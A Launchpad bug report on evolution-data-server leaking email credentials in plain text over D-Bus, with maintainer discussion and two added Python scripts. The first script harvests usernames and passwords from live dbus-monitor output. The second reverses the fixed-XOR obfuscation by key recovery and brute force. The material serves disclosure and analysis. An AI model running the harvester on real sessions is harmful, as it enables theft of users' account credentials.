org.gnome.evolution.dataserver.Source completely unveils account credentials in plain text while using dbus-monitor

Bug #1828124 reported by Norbert
Affects                          Status        Importance  Assigned to  Milestone
evolution-data-server            Fix Released  Unknown
evolution-data-server (Ubuntu)   Won't Fix     High        Unassigned

Bug Description

Steps to reproduce:
1. Install Ubuntu 16.04 LTS
2. Install Evolution
3. Set up a Google account with default settings (this will end up with e-mail and calendar)
4. Reboot
5. Open evolution Calendar and/or indicator-datetime
6. Launch `dbus-monitor`

Expected results:
* Evolution does not show account credentials in plain text in `dbus-monitor` output

Actual results:
* Evolution shows account credentials in plain text in `dbus-monitor` output:

method call time=1557268474.383095 sender=:1.74 -> destination=:1.40 serial=939 path=/org/gnome/evolution/dataserver/SourceManager/Source_17; interface=org.gnome.evolution.dataserver.Source; member=InvokeAuthenticate
   array [
      string "password:myrealpassword"
      string "ssl-trust:"
   ]
method return time=1557268474.383686 sender=:1.40 -> destination=:1.74 serial=366 reply_serial=939
signal time=1557268474.389206 sender=:1.40 -> destination=(null destination) serial=367 path=/org/gnome/evolution/dataserver/SourceManager/Source_17; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
   array [
      string "password:myrealpassword"
      string "ssl-trust:"
   ]

signal time=1557268520.956861 sender=:1.40 -> destination=(null destination) serial=408 path=/org/gnome/evolution/dataserver/SourceManager/Source_19; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
   array [
      string "password:myrealpassword"
      string "ssl-trust:"
      string "username:real@email"
   ]
signal time=1557268520.960443 sender=:1.40 -> destination=(null destination) serial=409 path=/org/gnome/evolution/dataserver/SourceManager/Source_18; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
   array [
      string "password:myrealpassword"
      string "ssl-trust:"
      string "username:real@email"
   ]
signal time=1557268520.964374 sender=:1.40 -> destination=(null destination) serial=410 path=/org/gnome/evolution/dataserver/SourceManager/Source_20; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
   array [
      string "password:myrealpassword"
      string "ssl-trust:"
      string "username:real@email"
   ]

-----
This is a huge security flaw. A malicious script can parse `dbus-monitor` output...
Not sure about more recent Ubuntu and Evolution versions.

ProblemType: Bug
DistroRelease: Ubuntu 16.04
Package: evolution-data-server-common 3.18.5-1ubuntu1.1
ProcVersionSignature: Ubuntu 4.4.0-143.169-generic 4.4.170
Uname: Linux 4.4.0-143-generic x86_64
ApportVersion: 2.20.1-0ubuntu2.18
Architecture: amd64
CurrentDesktop: Unity
Date: Wed May 8 01:40:27 2019
InstallationDate: Installed on 2018-01-04 (488 days ago)
InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
PackageArchitecture: all
SourcePackage: evolution-data-server
UpgradeStatus: No upgrade log present (probably fresh install)
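What the report's "malicious script can parse `dbus-monitor` output" remark amounts to, as an added example that is not part of the original report or of evolution-data-server: a parser that reads `dbus-monitor --session` output and collects every `key:value` string carried by `Authenticate` / `InvokeAuthenticate` messages on the `org.gnome.evolution.dataserver.Source` interface. The same script doubles as a check that a given build no longer puts credentials on the bus. The sample input is constructed to mirror the capture quoted above, with placeholder values.

```python
import re
import sys
from typing import Dict, Iterable, List

# Constructed sample input: same shape as the dbus-monitor output quoted in
# this report, with placeholder values (not a real capture).
SAMPLE = """\
method call time=1557268474.383095 sender=:1.74 -> destination=:1.40 serial=939 path=/org/gnome/evolution/dataserver/SourceManager/Source_17; interface=org.gnome.evolution.dataserver.Source; member=InvokeAuthenticate
   array [
      string "password:hunter2"
      string "ssl-trust:"
   ]
method return time=1557268474.383686 sender=:1.40 -> destination=:1.74 serial=366 reply_serial=939
signal time=1557268520.956861 sender=:1.40 -> destination=(null destination) serial=408 path=/org/gnome/evolution/dataserver/SourceManager/Source_19; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
   array [
      string "password:hunter2"
      string "ssl-trust:"
      string "username:alice@example.com"
   ]
signal time=1557268520.964374 sender=:1.40 -> destination=(null destination) serial=410 path=/org/gnome/evolution/dataserver/SourceManager/Source_20; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
   array [
      string "password:hunter2"
      string "ssl-trust:"
      string "username:alice@example.com"
   ]
"""

# Header line of a message on the Source interface whose member carries the
# credential array. Method returns and other interfaces are ignored.
HEADER_RE = re.compile(
    r"^(?P<kind>method call|signal) time=(?P<time>\S+) .*?"
    r"path=(?P<path>\S+); interface=org\.gnome\.evolution\.dataserver\.Source; "
    r"member=(?P<member>InvokeAuthenticate|Authenticate)$"
)
# One "key:value" string element inside the array that follows the header.
STRING_RE = re.compile(r'^\s+string "(?P<key>[^:"]+):(?P<value>[^"]*)"$')


def extract_credentials(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Collect the key:value strings of every Authenticate / InvokeAuthenticate
    message. Returns one record per message with its fields as a dict."""
    records: List[Dict[str, object]] = []
    current = None
    for raw in lines:
        line = raw.rstrip("\n")
        m = HEADER_RE.match(line)
        if m:
            current = {"kind": m["kind"], "time": m["time"], "path": m["path"],
                       "member": m["member"], "fields": {}}
            records.append(current)
            continue
        if current is None:
            continue
        s = STRING_RE.match(line)
        if s:
            current["fields"][s["key"]] = s["value"]
        elif line and not line[0].isspace():
            # A new top-level message means the array we were reading is over.
            current = None
    return records


def leaked_accounts(records):
    """Distinct (object path, username, password) tuples seen on the bus.
    Messages without a password field (e.g. only ssl-trust) are skipped."""
    return sorted({(r["path"], r["fields"].get("username", ""), r["fields"]["password"])
                   for r in records if "password" in r["fields"]})


if __name__ == "__main__":
    # Live use:  dbus-monitor --session | python3 this_script.py
    # With nothing piped in, run over the constructed sample instead.
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE.splitlines()
    for path, user, pw in leaked_accounts(extract_credentials(source)):
        print(f"{path}: username={user!r} password={pw!r}")
```

Nothing here needs privileges beyond the reporter's own session: any process running as that user can attach to the session bus exactly as `dbus-monitor` does, which is the point the report makes.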

Alex Murray (alexmurray) wrote :

I am not certain this constitutes a security vulnerability; however, I would be interested to know the upstream developers' opinions. Could you please file a bug with the upstream project in this regard? https://gitlab.gnome.org/GNOME/evolution-data-server/issues/new?issue%5Bassignee_id%5D=&issue%5Bmilestone_id%5D=

Changed in evolution-data-server (Ubuntu):
status: New → Incomplete
Norbert (nrbrtx) wrote :

Done https://gitlab.gnome.org/GNOME/evolution-data-server/issues/113 .

Showing the password in plain text is insecure in any case.
It may be stolen by a malicious application running on behalf of the current user account.
As a result the e-mail account may be compromised and used for spam and/or other malicious purposes.

Alex Murray (alexmurray) wrote :

Thanks. I am guessing that bug is private, as I can't see it (I just get a 404). Can you please let me know what upstream says?

Norbert (nrbrtx) wrote :

The bug-report on GitLab is now public, they created a patchset for it.

So we can transform this bug-report here to public.

information type: Private Security → Public Security
Changed in evolution-data-server:
status: Unknown → New
Changed in evolution-data-server (Ubuntu):
importance: Undecided → High
status: Incomplete → Triaged
Alex Murray (alexmurray) wrote :

From a security PoV this is basic security by obscurity and effectively pointless: they are simply XORing each byte with a fixed value and then base64 encoding it. Since the source code is public, anyone can easily find this out and hence easily decode it. The only way to do this securely would be to have the DBus peers negotiate a session key and encrypt it properly using this, so I don't think there is any point adding this faux-encryption in this case.

Changed in evolution-data-server:
status: New → Fix Released
Changed in evolution-data-server (Ubuntu):
status: Triaged → Won't Fix
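An illustration of the point made in the comment above, added here and not taken from the evolution-data-server patchset: with a fixed single-byte XOR followed by base64, the scheme is reversible by anyone who reads the source, and it is reversible even without the source, because a single known plaintext byte (the `password:` prefix on the bus is one) yields the key, and with no known plaintext at all there are only 256 candidates. The XOR byte `0x5A` and the assumption that the whole `key:value` string is obfuscated are placeholders for this example, not the upstream values.

```python
import base64
from typing import List

# ASSUMPTION: illustrative key only. The report says "a fixed value"; any
# fixed byte behaves identically for everything below.
XOR_KEY = 0x5A


def obfuscate(secret: str, key: int = XOR_KEY) -> str:
    """The faux-encryption as described: XOR each byte with a fixed key,
    then base64-encode. No IV, no integrity, same input -> same output."""
    return base64.b64encode(bytes(b ^ key for b in secret.encode())).decode()


def deobfuscate(blob: str, key: int = XOR_KEY) -> str:
    """What anyone who has read the (public) source can do directly."""
    return bytes(b ^ key for b in base64.b64decode(blob)).decode()


def recover_key(blob: str, known_prefix: str) -> int:
    """Known-plaintext attack: for single-byte XOR, key = cipher[i] ^ plain[i].
    Every known position must agree; otherwise the prefix guess was wrong."""
    raw = base64.b64decode(blob)
    candidates = {raw[i] ^ ord(c) for i, c in enumerate(known_prefix)}
    if len(candidates) != 1:
        raise ValueError("plaintext prefix does not match a single fixed XOR byte")
    return candidates.pop()


def brute_force(blob: str) -> List[int]:
    """No known plaintext needed: try all 256 keys and keep those whose
    decoding is printable ASCII. The real key is always in this list."""
    raw = base64.b64decode(blob)
    return [k for k in range(256) if all(32 <= (b ^ k) < 127 for b in raw)]


if __name__ == "__main__":
    blob = obfuscate("password:hunter2")          # constructed placeholder value
    print("on the bus:   ", blob)
    print("with source:  ", deobfuscate(blob))
    k = recover_key(blob, "password:")
    print(f"from prefix:   key=0x{k:02x} ->", deobfuscate(blob, k))
    print("blind guesses:", [hex(k) for k in brute_force(blob)])
```

The exact opposite of this scheme is what the comment asks for: a per-session key that the two bus peers negotiate, so that an observer on the bus cannot derive it from the message or the source.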